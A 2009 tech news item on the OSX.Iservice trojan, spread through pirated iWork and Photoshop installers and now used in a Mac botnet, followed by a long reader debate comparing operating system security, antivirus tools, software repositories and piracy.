Remember the Mac trojan that we reported about earlier this year? A trojan was found piggybacking on the back of copies of iWork and Photoshop CS4 found on warez sites and networks, and it would install itself after the user had entered his or her administrator password during the software’s installation. This trojan didn’t seem like much of a threat back then, but as it turns out, it’s now in use in the first Macintosh botnet.
Security researchers from Symantec have found evidence that said trojans, OSX.Iservice and OSX.Iservice.B, are being used in creating a botnet used for DDoS attacks. There’s at least one documented case of these trojans being used for DDoS attacks, and the researchers have found out that the botnet has encryption, a peer-to-peer engine, and remote startup capabilities.
“The code indicates that, wherever possible, the author tried to use the most flexible and extendible approach when creating it ^aEUR“ and therefore we would not be surprised to see a new, modified variant in the near future,” the researchers said. Interestingly enough, they added that the person who wrote the trojans is not the same person who activated the botnet.
If you think you’ve been infected, you can use any Mac antivirus tool to clean your system; most of them have been updated to include removal instructions for these trojans. Since we’re talking trojans here, there’s no need to worry about self-replication, as it’s incapable of doing that. As always, steer clear of pirated software to prevent things like this from happening.
Doubtless there will be snide remarks back and forth about how OS X was supposed to be the most secure OS, and there were no viruses for it. Put that aside for a moment and take it for the sobering wakeup call it is: No matter what OS you run, be it a fully patched Windows install, a fully patched OS X, or even a fully patched Linux install, all computers are vulnerable through their users’ lack of education. Personally, there aren’t many programs I don’t get from the Ubuntu repositories, unless there’s a newer version out; Linux is fairly safe in that regard, but if I were to download a torrent of anything that needed root access to install, I’d be a little worried about trojans too. On the one hand, serves them right for pirating software. On the other, it’s still a bitch that this happened. Computer users need to be educated before we let them loose into the wild.
The problem is not that they are punished because the pirate software (most of them probably won’t notice). The problem is that we that do not pirate are punished. A friend of mine says his mailserver receives 17 times more spam than “real mail”. The botnets are to blame.
It wasn’t a virus in this case, but a trojan.
Trojans are a potential problem for any system where the end users routinely install downloaded closed-source applications.
or open source ones and don’t read the source code.
Sigh!
No, you are wrong.
The distribution maintainers are not the same people who write the code.
The distribution maintainers necessarily MUST read the code in order to be able to put it into repositories.
In the real world, the distribution mechanism of open source repositories, coupled with a package manager on the client has an impeccable record.
http://www.google.com.au/search?q=define%3A+impeccable&ie=utf-8…
http://wordnetweb.princeton.edu/perl/webwn?s=impeccable
What part of “impeccable” do you not understand?
Edited 2009-04-19 07:05 UTC
The part where the Debian maintainer accidentally introduces a vulnerability in security-critical network facing software.
Or where the fedora repositories get owned remotely. This stuff can happen to the repository system (not saying that someone can’t attack Microsoft’s software distribution systems… I’m sure people have tried).
The case where the Debian maintainer introduced a vulnerability is not a case of an end users system getting malware via an executable. It was a security bug … not malware in and of itself.
The repository system has an impeccable record. There has been not one recorded case, over many years, for millions of users, of a user’s system getting malware through applications installed via the repository/package manager system.
The odd bit of buggy software? Yes, OK. But not malware. No trojan horses at all amongst all of that mountain of downloaded software. None. Zilch. Nada. Diddly squat.
Why is it apparently so very hard for Windows users to accept this fact?
Edited 2009-04-19 10:15 UTC
The fact that the OpenSSL “fix” in Debian wasn’t Malware would be irrelevant to anyone who’s system had been compromised and had their identity and other crucial information stolen, wouldn’t it?
The fortunate thing about the idiotic mistake by the Debian maintainer was that it was fixed very quickly, and that’s the only fortunate thing about it. This was an example of someone who did not know how OpenSSL worked mucking about in the code in an effort to improve it, and releasing that patched package into the community without proper testing. This means, by the way, that repositories are only as fool-proof as those who run them and maintain them… and there’s not one human being in the world today that hasn’t made mistakes.
I’ll certainly grant that repositories are, by design, a much more secure way of handling things than Windows or OS X have by default. But open your eyes, they aren’t fool-proof and do not have a perfect record. You can bury your head in the sand all you want, the real world is still around you whether you choose to look it in the face or not.
The fact is I take it upon blind faith when I connect to any community repository to install something that it has been properly maintained. The key word of course is properly. But I am completely at their mercy should someone have the means to introduce a root kit into a package with or without the maintainers knowledge. The official repositories work great, but quite often we do have to use the community repositories simply because a lot of packages just do not get included.
I think the point is in regards to this topic of OSX is not as much as OSX is more vulnerable, because ANY OS has its holes, that is a fact of life. I would love to see much more bitching and whining about the people behind this crap than the usual back and forth bantor about this or that OS. Any software is going to be vulnerable to a degree, and where there is a door and a pay off, someone will find a way to exploit. Viruses, bots, trojans, root kits, etc. have long since passed the domain of stupid little kids being mischievous. Today there is hardcore organized criminal groups that are operating 24/7 to find exploits in not just operating systems, but even secured network systems.
Pffft.
It is open source code. I’d love to hear your thoughts on a viable means that someone can introduce a whole raft of changes, adding up to a complete rootkit, into a set of open source code files without the maintainer’s knowledge.
As for “with the maintainer’s knowledge” … sheesh! What maintainer would have the chutzpah to even try such an outrageous and easily discovered thing?
(it is in plain sight of the whole user community, remember, not just the package maintainer).
It staggers the imagination that anyone believes that “a rootkit in the repositories” would be possible.
Some real-world examples of this wouldn’t hurt either. There are no non-repository packages installed on my current Arch Linux KDE 4.2 system, for example, and indeed it works great.
Just to be clear here … this particular malware did not get on to OSX because of any “security hole” in the OS. It got on to the systems via a trojan.
Trojans do not rely on security holes. They instead rely on the users installing them, deliberately, via normal means of installing software.
This can happen on ANY OS, but it can only happen if the users have no means of knowing (or being assured of the integrity of) what is in the code. Therefore, trojans are uniquely a problem for systems where users routinely install closed-source-code packages.
End of story.
I ask, once again, why it is apparently so very hard for Windows (and apparently OSX) users to accept this? It is as plain as the nose on people’s faces.
Edited 2009-04-19 23:51 UTC
I love Arch and the official repos are great, but there are many apps that are not in there and you have to go to AUR. On my own machine I have both a playstation and a playstation 2 emulator, both of which had to be installed from AUR. Those might be uncommon, but there are more common apps that are not in the official repos to. For example gnome-globalmenu and the avant window navigator (awn). And if I remember correctly in order to install KDEmod you have to use an external repository.
A few points to make here:
(1) AUR is an open source repository. It is, AFAIK, a community source packages repository, it is not signed binary pre-compiled executables. One needs a client program other than pacman to install AUR packages, I believe yaourt is popular for this purpose. AUR is still, however, an open source repository.
http://wiki.archlinux.org/index.php/Yaourt
(2) Community open source repositories, AFAIK, enjoy the same impeccable record that official distribution repositories do … it is just that they are often far less well known. I certainly am not aware of any end user’s system ever getting malware via installing a program from a community open source repository.
(3) My KDE 4.2 Arch system, which works very well and which is very functional, does not include any packages from AUR. It does, however, use the KDEmod community repositories, which are, in turn, derived from the KDE project itself (all that the KDEmod repository does is compile and package the KDE desktop for Arch). It is not a case of repository maintainers going out and re-writing their own code, after all.
Edited 2009-04-20 03:24 UTC
AUR does not store any packages. It only stores scripts. You download the script and run it to get a package. You then use pacman to install the package. Most scripts download the source code and compile it, but there are some that download a pre-compiled binary. Yaourt or the like is NOT required.
Because of it’s nature it would be quite easy for somebody to submit a package build script with malicious commands in it into AUR. It would eventually be found and removed, but not before somebody downloaded it. This is why the the wiki warns you to read through the package build script before running it.
Just because it hasn’t happened yet, doesn’t mean it can’t or won’t.
There is still a potential for abuse here. KDEmod repos are maintained only by the KDEmod devs. They could easily add malicious code to the applications themselves, or worse yet to the install scripts for each package which are executed as root. Non-official repos such as KDEmod are the Linux world equivalent of downloading programs from shady websites in the Windows world.
There is a good reason behind requiring you to edit a config file as root in order to enable a custom repo.
You are talking theory … I am talking real-world performance. track record. What actually happens in real life.
I repeat for those who are apparently so very slow on the uptake … the package management systems and repositories for open source code have an impeccable track record. There has never been even one recorded case of an end user getting malware through this means of distributing software.
When people talk about concepts such as “There is still a potential for abuse here. KDEmod repos are maintained only by the KDEmod devs. They could easily add malicious code to the applications themselves” … they are simply not talking about what happens in the real world.
Sigh! Get real.
Get over it, Windows apologists. I cannot see the point in your inventing endless fantasies about open source that simply do not happen. The plain fact remains that the distribution system of open source code repositories, coupled with package management programs on the client machines, has an impeccable record as a means of malware-free software distribution.
Two points, here, with respect to that:
(1) No-one’s system was compromised. The error that was made resulted in it being easier by an order of magnitude to compromise the system … had anyone known about it. Even so, cracking the security even with this bug is no mean feat, and would have still required years of supercomputer time.
(2) However, no-one spotted the error for some while. Over two years, I believe … which supports the observations in (1) above.
Yes and no. The code still worked after the maintainer “improved” it. It is impossible to test that one version will take a supercomputer 5 years to crack, as against another version taking the same supercomputer 50 years to crack, if one does not happen to have on hand a supercomputer and 50 years of testing time …
True. Without a doubt.
I didn’t say they were fool proof … I said that they had an impeccable record. There is a vast ocean of difference in meaning there.
Furthermore they do indeed have an impeccable record. As I said, not one users system has been compromised or got infected with malware via installing software from the repositories using a package manager.
Any system on Windows and OSX cannot come close to touching that record … as this very thread topic attests to.
Sigh! No, you are wrong. The distribution maintainers are not the same people who write the code. The distribution maintainers necessarily MUST read the code in order to be able to put it into repositories.q]
What? I have never read through any software package I maintain. How am I supposed to read million lines of code? even it would take days to read through new versions for one package.
You are obviously living in an ubunto brown dreamland of linux propangadna.
I might as well start “there are no viruses for it”
There are no virus for it. Period.
I am aware of the difference between a virus and a trojan. Just now, every trojan infected Mac is a vector for a new virus.
better don’t start because this is one useless argument: a month ago you would argue that there’s no iBotnets either.
“Personally, there aren’t many programs I don’t get from the Ubuntu repositories”
This is one of the main things that can actually create a secure system. When users get their apps through their Linux distro’s repository, they’ve been tested and users can feel safe about installing them. Getting them elsewhere is just like leaving the door wide open. There are trusted 3rd party repositories, but you know what I mean.
What I’m worried about most is that the majority of people that run OS X don’t have any form of antivirus software, and still think that there are no viruses for mac, so won’t be looking to install any. That’s what worries me most :S
Antivirus isn’t necessarily any good if you’re inviting nasties into your system anyway. I can’t count how many PCs with Norton I’ve come across that have been riddled with viruses, because either a) Norton is incompetent, or b) a virus disabled or broke Norton in the many ways that’s easily possible.
Users running anti-virus on Macs would help, but only to a certain extent. There is no software to fix idiocy.
The solution to this, as I see it, is for Apple to push an update that removes it — a lot like Microsoft’s monthly malicious software removal tool.
Also, there’s no software to save us from viruses that we don’t know about. Security holes that haven’t been disclosed to the public.
What about heuristic analysis?
How about not borking the system with useless computations? The system should be safe by design. If the user finally downloads illegal content which might have a trojan embedded, then it’s the users fault. Other users shouldn’t be punished because of them.
The funny bit is, though, that a trojan like this would NEVER get through Windows Vista/7. Malware protection is built-in now, so I’d get a nice little dialog on my Windows boxes telling me this file is dangerous, we’ve blocked it for you. You want us to delete it?
Mac OS X has none of these kinds of features, and that’s why users get infected. People are going to download warez ANYWAY, so the better approach would be to protect users in cases like this – Windows will protect you, Mac OS X will not; because the latter has never had to deal with things like this, the OS wasn’t designed for it.
Cold and hard facts, and I’m sure the Apple Defense Brigade will be all over me like I’m covered in Tuscan honey and fairy dust, but it’s the truth.
Edited 2009-04-18 13:35 UTC
I don’t buy it. There’s no perfect solution for trojans. If the trojan is unknown there’s a big chance it will get executed. Also no matter how many dialogs you get about something being dangerous, you’ll push Ok button to get your software installed. Well, not you, but most other stupid users will.
Edit: on a side note, anyone remembers tbav for dos? Anyone remembers it’s really good heuristic method? It involved actually tracing the program in debugger mode to find if it did something nasty.
Edited 2009-04-18 14:17 UTC
I don’t know if you’d call it “perfect” … but there IS actually a viable solution for Trojans.
Solution: Adopt a self-imposed policy of “only install applications from repositories using the package manager”.
This solution has worked for millions of people for many years now for hundreds of downloaded applications each. It has an impeccable record for those who stick to the policy.
Edited 2009-04-18 15:27 UTC
there have been cases of compromised repositories
sure they were cleaned up after a short time, but it’s not a perfect solution
and i doubt a repository like you know it from linux works with the millions of apps for windows (and ms can’t lockout someone from an official repository)
How about not downloading pirated applications? That would pretty much take the chances down to 0
Hmm, really?
How many people have turned off UAC because it was annoying? My mum received her machine with it off. I’m not sure why, but it’s disabled. She’s too afraid to click okay to just anything but there is always a possibility.
Besides, this wonderful security model in Windows Vista–it’s all trumped by OLE2/ActiveX. It’s a huge gate in the security wall.
I hope this wakes up a bunch of Mac users, but I’m cynical and don’t believe it will.
I’m also not surprised about Symantec warning us now instead of previously when the software was first reported to have an exploit. On the news programme “60 minutes”, the Symantec spokesperson never mentioned that there was a fix for Conficker directly from Microsoft.
Thom Holwerda wrote:
–“The funny bit is, though, that a trojan like this would NEVER get through Windows Vista/7. Malware protection is built-in now, so I’d get a nice little dialog on my Windows boxes telling me this file is dangerous, we’ve blocked it for you. You want us to delete it?”
I find this doubtful. Practically all Windows games and most applications requires administrator rights to install (mainly because of arcane copy protection mechanisms), how would the OS distinguish between DRM functionality included in a game (like protections which install services) and a trojan if baked into the installation procedure? These DRM schemes, just like trojans and rootkits vary greatly and are constantly changed so there is no way the OS can be updated to keep track and identify them, not even dedicated virus software can keep up.
This isn’t about UAC, this is about Windows Defender. Defender does its thing with or without UAC, with or without administrative privileges.
The day I trust Windows Defender to keep my system secure is the day I trust Windows Firewall… not happening. MS may be attempting to be better at security, but they don’t exactly have the best reputation for it and I’ll wait for proof before I trust them.
Thom Holwerda wrote:
–“This isn’t about UAC, this is about Windows Defender. Defender does its thing with or without UAC, with or without administrative privileges.”
Granted, I’ve have used Vista ever so slightly and during that time I did not install any software but I’d guess that when you install commercial software like a game or an application Windows Defender will warn you that this software can do harm to your system (due to copy protection/DRM code), and users will click past this warning in order to install said game/application. So how hard would it be for a cracked version to just include a rootkit in the crack which will then piggyback on the game/app installation?
Windows defender is just a trimmed down antivirus program which only scans for trojans and it is not even a good one. If you are lucky the signature of the trojan gets added and Windows defender finds it if you are unlucky you are screwed anyway…
So nothing new there, Windows defender just does what other anti virus programs also do.
The main security issue with Windows Vista and 7 is that they finally sandbox the user outside of the root context within a user context, a basic security measuer performed by any other operating system. But that does not prevent malware to get in via “social engineering” aka users hitting the ok button every time the Vista/7 program needs root access popup pops up!
Actually it would come through like any other program trying to do an internet connection…
If you install something on your machine which makes internet connections then you are hosed if it is malware. The only chance you have in this regard with windows 7 would be that microsoft could add the signature over time to windows defender or any other anti virus program has the signatures…
The malware is installed via the normal install process if you hit the ok button from the Windows User Control popup then you are screwed in this regard as well…
Cheers…
Oh dear.
Just when I thought your comments couldn’t get any worse, they do.
And it just shows your ignorance.
I’m not sure what else to say.
People automatically click yes to UAC, because it’s the easiest way to get rid of it and open what they want to open.
That is if they haven’t disabled it already.
Windows Defender I’m sure is fine (Although I’ve never had it work for me terribly well) for known threats, but if a new threat is on the block, I wouldn’t imagine it to work very well, just like Antivirus Software.
Any stupid user is going to infect any system, even Vista and Windows 7.
I’m beginning to think you’ve had a knock in the head if you believe that Vista/7 would stop any stupid user from infecting a system regardless to whether it’s patched.
He’s talkin ’bout Defender; not UAC. Trojans are blacklisted onto Windows Defender updates. It also monitors a good deal of suspicious behaviour. Unless we’re dealing with really advanced trojans; they’ll likely be caught.
I didn’t say that heuristic analysis is the best thing there is, I just said that it’s not true, that “there’s no software to save us from viruses that we don’t know about”.
Heuristics in all the antivirus products on the market raise almost exclusive false positives… which is why i think they are there. Who would buy antivirus software if they aren’t confronted with a “virus” from time to time.
Or c) the preloaded 3-month trial version of Norton that came with the computer expired and the owner didn’t realize it. Or d) the copy of Norton just randomly decided that it wasn’t properly-licensed and deactivated itself (although that possibly falls under point a).
well, that might change right now.
I’ve lost count to the number of computers running anti-virus software for this-or-that vendor that I had to “desinfect”. I’ve also lost count to the number of “infected” computers I had to reinstall because the anti-virus software went completely beserk (from the countermeasures used by the viruses themselves).
Fortunately, this isn’t my job anymore…
However, anti-virus software is still useful on Windows. But that’s because of the massive number of available malware for this platform combined with the almost baffling ignorance of most users.
I’ve always ran anti-virus software on my Windows machines, but only once in 10 years did I get an infection (noticed almost immediately by a sudden burst of browser popups). And only maybe two or three times in that same amount of time did I get a warning from the anti-virus software about some blocked virus.
These Mac viruses are based on user ignorance alone, an AV software can do almost nothing to prevent this.
Avoiding crack/serial sites and pirated software is a good place to start to avoid getting pwned. And today there is hardly an excuse for pirating software, even in Windows-land. Most computers already come with a Windows license, and there are opensource options for most of the rest (the only “alternative” that most people would probably not want is the office suite, but MS Office is not as expensive as it used to be).
Don’t be worried. There are no OS X viruses.
That’s why I believe the idea that antivirus companies are behind the creation of these viruses.
In the same way that all locksmiths are behind burglaries?
Actually I a local locksmith was charge for break and enter three weeks ago, I went to school with him. I knew not to trust him!
Many years ago one of my police friends told me that many locksmiths are closely associated with burglars or are burglars themselves. He said houses are often burgled a few weeks after a visit by the locksmith. In particular expect your house to be burgled if you buy a safe from a locksmith.
We, the members of the Global Association of Honest Locksmiths, would like to thank you for destroying our businesses with FUD, and for casting our families out onto the streets.
BTW, what’s your address?
And they’re in league with the Lumber Cartel, of course (the sinister, shadowy group responsible responsible for anti-spam advocacy).
There aren’t. This malware is a Trojan, not a Virus. It does not replicate itself and it does not get onto a System without the help of its user.
Since Antivirus software can’t really protect you from that kind of malware more than to give you a false feeling of security, i still regard antivirus software for OS X obsolete.
I wouldn’t even think about buying antivirus software for Mac before we had something that comes over the network without my help, like Blaster or Conficker.
Worse yet OSX only has rudimentary anti-hacking measures. Leopard introduced limited ASLR and MAC. Vista and Linux have much more sophisticated access controls and address memory relocation schemes.
Sounds fishy to me.
I’m sure if viruses where a real threat to OS X, Apple would includes anti-virus (for free) as a tool in their OS. Apple is ahead of the curve people. Apple would not ‘forget’ to add something this obvious to thier OS.
OS X FUD + money grabbing Symantec
If I can convince you to install my custom OS X applicationABC, then you do, and it does harm, is your OS insecure? or are you stupid/cheap for not buying the legal applicationABC in the first place?
Willfully installing dubious software comes with risks people. iWork is cheap, just go buy it.
Edited 2009-04-18 13:02 UTC
No offense, but what you said seems like a fanboy remark. If you look at the security model of Leopard vs Vista; Vista is a lot more secure in design. The reason mac didn’t have till date is the same as before — it wasn’t a lucrative target for virus-makers till now. Not cuz “apple is ahead of the curve”. If that were the case they could have done some justice by including atleast a simple paint-software (iPhoto is *NOT* what I want).
As for being “cheap”, even World of Goo at $20 is pirated at 90% — it’s about getting things for free; and those two are *quite* different. IMHO.
However; I don’t think antivirus softwares are as needed as customer awareness and education . There was this incident where my friend complained that his (pirated) copy of Symantec was outdated. When I gave him Avira; he COMPLAINED that it showed a lot of virus warnings; so removed it…
You are wrong. All major Windows virus and worms get in without the need for the user downloading and executing them.
This is just a case for user stupidity.
People like analogies, so here goes one:
A guy is worried about his house safety. So he buys the best door and a good security system. It works fine. Only he is able to get in and out. One day he meets another guy in a party, they talk and seem to become good friends. He invites his new friend home and lets him in. He got robbed.
Edit: after re reading that “vista is more secure in design”, come on. What design?
Edited 2009-04-18 13:25 UTC
About the only thing that Microsoft actually provides is Defender which protects one against spyware/adware/etc.
What I don’t understand is why it is the operating systems responsibility to protect people from installing things they downloaded off the internet. What one needs to do is separate (as you did in your analogy) between a user downloading and choosing to install something from a non-reputable source and a worm which makes its way into a computer through a security hole in the operating system – that is, an outside attack on the operating system and not an infection bought into the system by the end user him or herself.
The simple fact of the matter, people downloaded pirated software, they knew the risks, they were also shown how to remove this nasty from their system the moment it was found – and yet they failed to take any step. To me, those who are infected are just as guilty as those who failed to update their copy of Windows and have become infected by the conflicker worm.
Edited 2009-04-18 14:08 UTC
Bleh. Enumerating badness is always a bad idea but OSX only has rudimentary anti-exploit measures compared to Vista and Linux even when you ignore blacklisting applications like Defender. Only in Leopard did Apple introduce Mandatory Access Controls and limited ASLR, which is similar to what Windows offered with XP SP2.
Despite whose fault it is these issues can be mitigated to some extent through proper access controls.
There is a point where an individual has to start taking responsibility for the choices they make; I was just pointing out that even with all the security features there are still infections. The prime example would be my old man who been infected – something that could have been stopped had he ran Windows update. So with all the features the weakest point of failure is always going to be the end user.
I’m neither going to attack Microsoft or Apple because attacking them is like attacking AIG for the financial fiasco and ignoring the individuals within the market external of the ‘great Satan’ (aka AIG) who caused it.
And even when the controls are in place the system is just as vulnerable as Mac OS X with less of those proper access controls. As I said the end user is the weakest link – and the only way to get around this is through automatic updates (which Apple and Microsoft have on by default) – but even then there is a window of opportunity. As I said, it comes down to personal responsibility – a virtue that many people in today’s society try to evade.
No. If a system has proper access controls this can’t happen. A program like iWork is NOT going to open ports and participate in a botnet if there is a proper policy in place. That would require the user to manually change the policy, which is above and beyond a normal users’ ability.
Automatic updates are NOT going to solve this as well as access controls will. Updates don’t help at all for a 0-day, a good policy will. Without being able to protect against unknown threats, any security technology is severely limited because you are back to essentially enumerating badness.
“There is a point where an individual has to start taking responsibility for the choices they make;…”
You just hit the nail on the head. Sadly in todays society, people are taught from a young age that everything is always someone else fault. That is why there are so many lawsuits and idiotic defenses these days. That carries over into computer usage and everything else people do. People don’t have a clue what it means to be held accountable for actions these days, as if they do something wrong and don’t die, they can always sue someone for their own stupidity.
You’re missing the bigger picture. These things can be mitigated. The technology exists. Users are going to do stupid things, we know that. Bitching about it incessantly isn’t going to get us anywhere. Instead we should focus on getting proper security implemented in Desktop operating systems. iWork should not have priveleges that allows it to connect to a botnet.
iWork doesn’t have privileges which allow it to connect to a botnet. This trojan simply piggy-backed on the iWork installer, and it took advantage of the elevated privileges the installer temporarily acquired to insert itself into the startup routines of the computer. The trojan isn’t in iWork itself at all, it just on the installer pkg… and if anyone has ever looked at an OS X pkg file, you know this is distressingly easy to accomplish. It’s also easy to remove the trojan from the pkg, but you’d have to know to look for it.
I’m not sure how we’d avoid things like this. We can insert all the security we want, but if the user grants the required privileges to something malicious, and ignores all common sense… well, we can’t save the idiots from themselves.
This doesn’t change anything. The installer should not have these priveleges. Something like this is easily mitigated. This should be extremely easy considering iWork is a product from Apple.
I agree that users are always going to do stupid things but when we already have solutions to the problems they encounter we should be supporting those solutions, not bitching about user stupidity.
The reason the iWork installer, and other pkgs, have such privileges is that they are required to write to the /Applications folder where such items are stored.
What Apple needs to do is to have a much finer grain of control over security, an installer could explicitly request that it have permissions to write to the /Applications folder and nothing else if it doesn’t need it. But the fact is, even if they did that, it wouldn’t help. You can put a trojan into just about anything, piggy-back it on to almost any installer package you want, because the pkg folder is extremely easy to dissect and modify for anyone who knows what they’re doing. It’s about as open as you can get, both in specifications and literally easy to view and modify.
If Apple were to close this up, make it harder to modify, you’d have everyone in an uproar about the fact that the format was now closed, how dare they, etc etc… If they leave the format open, it’s very easy to embed bad things into it and to modify the installers accordingly. Where’s the happy medium in this situation?
It comes back, yet again, to user stupidity. It doesn’t matter how much security you implement, and it never will when it comes to manually installed trojans and viruses. Yes, the danger of worms and other remote vulnerabilities can be mitigated, but we’re not facing a remote vulnerability here.
Whoops, was away a bit too long.
@sbenitezb
Virii get in without users’ need? Besides Conficker I can’t recall a good case. XP’s security sucks; no doubt. But I’m not referring to XP. Even in XP; avoiding IE + Autoplay was all it took for me to skip any virii ending up on my laptop for over 2 years.
Your analogy applies just as good for Vista. Nevertheless I don’t like analogies to prove a point, they’re generally good for teaching only.. IMO
As for the security; take a look at the Miller’s interview. Whether you think he’s a scumbag or not; the precautions he mentions taken by vista are much superior. There you have it, your “design”. On the other hand; how is “leopard’s design” any better?
@kaiwai: Seconded.
Edited 2009-04-18 14:28 UTC
Quit saying virii. The english plural is viruses. And the latin plural is not -ii.
And, just a reminder … it wasn’t even a virus in this case. It was a trojan. That means that people downloaded it, deliberately, themselves, from an untrustworthy source, installed it without having any idea at all of its integrity, and ignored any warnings that popped up while they did so.
No system can survive stupidity like that.
The only possible “defense” is to avoid installing closed-source applications in which malware can be hidden.
Edited 2009-04-18 15:32 UTC
Thing about that is… it would only work if the os in question uses a package manager. OS X doesn’t, neither does Windows, and I’d hate to see what Apple might attempt to do if they built a central package manager into OS X. Mac App Store and jailbreaking, anyone?
@sbenitezb: about virus…es, it was something of a fetish
@Kroc: MD5!?! Why would a general user go through something as geeky as checking the MD5 hash?
@werpu: No — an anti-malware is NOT an anti-virus. Also; wha!? Did you even use vista?!?
I second darknexus, all it takes is a serial-key..
I know anti malware is not anti virus, but the lines between malware, virii and trojans are blurry, many antir virus packages also come with anti malware and anti trojan functionality. Windows defender is not an exception here, but it leaves out dedicated virii and some kind of malware due to not trying to push into the markets of anti virus vendors. I am not sure how good Windows defender is, but I rather doubt that it decreases your chances of being hit by a trojan if you apply user stupidity a lot…
I have not heard too many good things about it but on the other hand also not too many. Probably because most people do not bother too much about it, but go for a different solution anyway…
this is from an interview with the guy who cracked safari in a matter of seconds in the last pwn2own
http://blogs.zdnet.com/security/?p=2941
Apple has a long, distinguished history of completely ignoring security, and that hasn’t changed in osx
I honestly don’t know/understand what makes an OS secure or not. All I know is that I know of no OS X/Linux users with a virus and with Windows…..
This article is not talking about a virus, it’s talking about installing custom software that normal OS X users would be at risk of, and that can’t even spread.
What we’re talking about is users that intentionally download illegal software and ignorantly trusting the sources.
@lqsh: In majority of those “windows….” cases it’s through cracked software; and not updating their OSes…
Edited 2009-04-18 14:28 UTC
Guess I better tell my grandparents to stop downloading all those warez then
so majority of windows’ users are grandparents?
EDIT: and they’re updating the OS too?
Edited 2009-04-18 14:53 UTC
He missed a grandparent-friendly case:
“Please click on this link to view an animated ecard program sent by your grandson!” *trojaned*
In contradiction to a previous poster’s comment, more like 80-90% of Windows badware exploits no vulnerability in the OS. Most of the rest are developed after the patch was released via reverse-engineering.
Perfect example, and aside from pirated/illegal downloads, easily the most prevalent cause of infection. Specifically, I see a lot of these that have a payload of Vundo along with several others such as AV360 and SPW2009. The number of times I’ve had to clean those out…
This is why educating computer users would be more valuable than any Antivirus solution… a pity most don’t seem to want to be educated. You have a tool (a computer in this case) you should be expected to know some things about maintaining it and safety (both yours and everyone else’s).
I wanted to; but couldn’t get a good e-mail into my head
Actually Vista is not really that much more secure by design, the system security measures are pretty much up to par trying to put the user into a sanxbox model and trying to enforce userland on everything.
(Which vista failes utterly with UAC popping up every five seconds instead of trying to sandbox root access programs, but neither does osx, but the programs mostly behave better with their possible user land install for 90% of them)
The main difference is that vista comes with a trimmed down antivirus program, windows defender…
The rest is propaganda by Microsoft, sorry!
Burrowing your head in the sand is an awesome defense strategy.
Antivirus vendors try to make a big deal out of it. It isn’t a virus, it isn’t even a worm. It can’t replicate itself and it isn’t any threat for real. It’s just a trojanized program. People downloading illegal software from p2p networks are really asking for trouble. You can’t trust anyone, but the software maker or very known distributors.
Whatever people say about OS X and other *nix kind security, it’s clear in this case it is not the OS’s fault, it’s the user’s fault. The OS can’t and won’t ever prevent malware from executing if the user is giving consent to execute software.
I would find hard to not believe Symantec is not involved in this illegal distribution of trojanized software to spread some FUD and convince Mac users they need their “protection”.
“At least ****ONE**** documented case”
OOoOoooohhhhhh scary.
Not to mention is users actually INSTALLING A VIRUS themselves. News Flash:users can install whatever software they want by hand.
Compare/contrast to the monthly alerts on REMOTE-EXPLOITS found in Windows that occur without the users interventions/knowledge and learn what the difference is in code quality between the two.
Edited 2009-04-18 13:38 UTC
“Mac OS X doesn’t have trojans.”
“Well, it has a trojan now, but at least it’s not used for anything.”
“Oh, it’s used for botnets now? Well, there’s only one documented case, no big deal.”
I don’t need a pattern recognition system to figure this one out.
What do you expect to get for nothing? If you can’t afford iWork, download OpenOffice for your Mac. Don’t download custom build iWork packages from sharing sites/software.
I can understand the need to pirate Microsoft Office, when the fancy version is the same price as the PC hardware (WTF Microsoft??), but iWork is reasonably priced and works well.
And *even* then, iWork has no anti-piracy measures in it, neither does it require a serial. Therefore, people are even more stupid for not checking MD5s and trusting any old download to be unmodified.
You’re thinking of iLife, not iWork. iWork does require a serial number, however that is it. There’s no activation or other anti-piracy measures in it, so what a smart person would have done would have been to download iWork directly from Apple and just get the serial from somewhere else if they were going to pirate it. Then again, typically those who pirate software lack in the intelligence department, or at least in common sense.
Still, software piracy (for lack of a better term) is wrong. If you don’t want to pay for the cost of that proprietary software package, don’t use it. Find one that costs less or is free, or go without.
Except you’re wrong in that iWork ’09 does NOT require a serial number like iWork ’08 did.
Oh, yes it does, at least if you download it. I know, as I bought iWork 09 and received a serial number… and entered it to unlock after my thirty day trial period had ended. Perhaps if you order it on cd it’s different, and it may very well be different if you bought it with your Mac instead of afterward.
The download version needs a serial no. The disk version doesn’t.
I was reading on Wikipedia the features “missing” from the Mac version of MS Office, when compared to it’s contemporary Windows counterpart. It seems to me that OpenOffice has better MS Office compatibility on OS X than MS Office.
“Remember the Mac torjan that we reported about earlier this year?”
Nope, Don’t remember any torjans
Why would a Mac user buy anti-virus software which protects again known viruses, if there never has been an OS X virus?
What exactly would (those sleeze-balls) Symantec by looking for? LOL
Heuristics are fairly reliable. Maybe not Symantec’s … but still.
Symantec is looking to provide us with security so that we can roam about the big bad world of Internet safely, on second thought Symantec might be interested in extracting more money from us by scaring the $hit out of us.
Period… there are iViruses(tm).
…for stupid people that install pirated software like this.
Ah, but there COULD be. How hard would it be to set up a site with md5 sums of “healthy” programs, to compare to warez you download? Even if you don’t trust the site, you’ll know if there’s a problem when the md5s don’t match.
Moredhas wrote:
–“Ah, but there COULD be. How hard would it be to set up a site with md5 sums of “healthy” programs, to compare to warez you download? Even if you don’t trust the site, you’ll know if there’s a problem when the md5s don’t match.”
Uh? These cracks would have to make changes to the programs code which would then result in a different md5 hash, no matter if they inserted a trojan or not.
…so a “Virus Scanner” would be near useless in detecting this installation anyway.
As part of an installation app I wrote for one of my companies I have a script that talks to one of our servers to download components used during the installation depending on install-time choices made by the user. It does this all invisibly – just telling the user that it is “Collecting Data” – after getting the user to authenticate. I could have that script do a whole range of other things including install a startup that gives me some remote access – that is very easy to do.
But that is not a virus. It is an app installed by a user. No different to the one in question. The author just piggybacked his app’s installer onto the installer for another app – and that isn’t hard either.
If I wrote an app and called it “ZOMG BEST P~A~RN DOWNLOADER EVERRRRR” that was nothing BUT a bot and stuck it out there as a torrent there would be some idiot download and install it, even if it asked for admin privs. And it wouldn’t be a virus either…
I don’t know of any current AV applications that only scan for & remove viruses that meet the literal, technical definition of a virus. All that I’ve used will also remove trojans, or detect them with the background/live scanner if the user tries to install one.
Most applications referred to as “anti-virus” are really “anti-malware,” strictly speaking.
Edited 2009-04-20 00:02 UTC
With the sophistication of most malware these days, regardless of the method they use to infect the user’s (normally Windows) system, they have become very adaept at avoiding detection after they have been installed. There are many mechanisms employed, ranging from rootkit-like behaviour (where the OS is not even aware the malware files exist on disk), through to disabling any installed scanners (or, more sophisticated, preventing the installed scanners from detecting just the particular malware in question, but otherwise appearing to work normally).
The only chance one has, on a Windows or Mac OSX system where users routinely install closed-source binary executables, is detection on first access (ie on installation). After installation, very often all bets are off.
